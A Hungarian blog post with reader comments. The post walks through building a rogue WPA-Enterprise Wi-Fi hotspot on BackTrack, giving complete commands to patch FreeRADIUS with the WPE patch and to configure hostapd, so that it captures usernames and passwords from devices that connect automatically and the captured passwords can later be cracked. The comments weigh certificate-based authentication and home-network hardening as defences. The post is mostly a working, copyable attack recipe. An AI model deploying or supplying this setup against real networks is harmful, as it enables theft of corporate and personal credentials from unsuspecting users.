Ma szórakoztam egy kicsit a Wifi-vel és a következő érdekes eredményre jutottam :
BackTrack 5 R2 :
Előkészületek :
wget ftp://ftp.freeradius.org/pub/radius/old/freeradius-server-2.1.11.tar.bz2
wget http://www.opensecurityresearch.com/files/freeradius-wpe-2.1.11.patch
tar -jxvf freeradius-server-2.1.11.tar.bz2
cd freeradius-server-2.1.11
patch -p1 < freeradius-wpe-2.1.11.patch
./configure
make
make install
cd /usr/local/etc/raddb/certs/
./bootstrap
ldconfig
radiusd -v
(ez volt a Rádiusz szerver installálása)
/usr/local/etc/raddb/proxy.conf <- kommentbe a következő sorokat : # Sample virtual home server.
home_server virtual.example.com {
virtual_server = virtual.example.com
}
A rádiusz szerver indítása :
radiusd -X
Hotspotad installálása és futtatása :
apt-get install libnl-dev
wget w1.fi/releases/hostapd-1.0.tar.gz
tar -xvzf hostapd-1.0.tar.gz
cd hostapd-1.0/hostapd
cp defconfig .config
vi .configure (ez elől ki kell venni a kommentet : CONFIG_DRIVER_NL80211=y
make
make install
vi hostapd-wpe.conf
interface=wlan1
driver=nl80211
ssid="vallati WiFi ssid"
logger_stdout=-1
logger_stdout_level=0
dump_file=/tmp/hostapd.dump
ieee8021x=1
eapol_key_index_workaround=0
own_ip_addr=127.0.0.1
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
wpa=1
wpa_key_mgmt=WPA-EAP
channel=1
wpa_pairwise=TKIP CCMP
hostapd hostapd-wpe.conf
Ezzel elérjük, hogy fel tudunk konfigurálni egy hamis vállalati Wifi hotspot-ot ami nem pre-shared-key-el autentikál, hanem WPA-enterprise módban. Ennek segítségével be lehet gyűjteni automatikusan kapcsolódó eszközökről a usernév és jelszó információt. További trükkös programokkal a begyűjtött jelszavakat fel is lehet törni.
Ennyit a Wpa2-Enterprise biztonságáról....
Aztán miért kapcsolódna automatikusan is bárki.?
VálaszTörlésMert okostelefonokon ezt szokták beállítani - így a legkényelmesebb... (meg pc-ken is a windowsban a default, hogy automatikusan kapcsolódik.) Hát ezért.
TörlésÉs mi a helyzet ha certificate-ekkel autentikál.?
VálaszTörlésAz a legbiztonságosabb megoldás. A baj az szokott lenni, hogy egyéb megfontolásokból általában nem ezt a megoldást használják, hanem inkább a rádius szerver + felhasználónév+jelszó megoldást. AD autentikációval vagy önálló user adatbázissal.
TörlésA tanúsítvány menedzsment (mindenféle eszközökön) meg rudja bonyolítani a dolgokat... A felahsználónév/jelszó használat jóval kevesebb menedzsmentet igényel.
Nemrég raktam openWRT-re freeradius-t, már látom hogy openSSL-el kell generáljak magamnak cert-eket ha nyugodtan akarok aludni :-)
VálaszTörlésDe tudok olyan helyet, ahol meg LDAP-autentikáció van, mac address szűréssel..
Bár szerencsére az emberek 99%-ának fogalma sincs mi az hogy BackTrack vagy hogy Kali Linux, arról nem is beszélve, hogy a környéken van elég sok WEP-kódolású is, csesztessék csak azt :-)
..közben az is eszembe jutott, hogy ha mondjuk felemelem a sztenderd tíz percről mondjuk 24 órára a radius autentikációs időkorlátot, vagyis hogy egy nap alatt maximum egyszer küldjön ilyen csomagot, azzal is el lehet elcseszni a "hallgatózó" napját eléggé, nem.?
VálaszTörlésOtthoni hálózatnál nem érdemes ezzel vacakolni. Simán elég egy elég hosszú és elég bonyolult jelszó WPA2-es titkosítással. A tudomány mai állása szerint ezt megtörni nem olyan egyszerű... A plusz radius szerver vállalati környezetben használatos inkább. Egy plusz autentikációs faktorként. Otthon ennek nem sok értelmét látom...
TörlésPár hete felvacakoltam openWRT-re, leszedni már nem fogom.. Meg persze ennél is lehet 64 karakteres random jelszó..
VálaszTörlésÖrülhetsz, kijött az új Kali Linux 1.0.8...
VálaszTörlés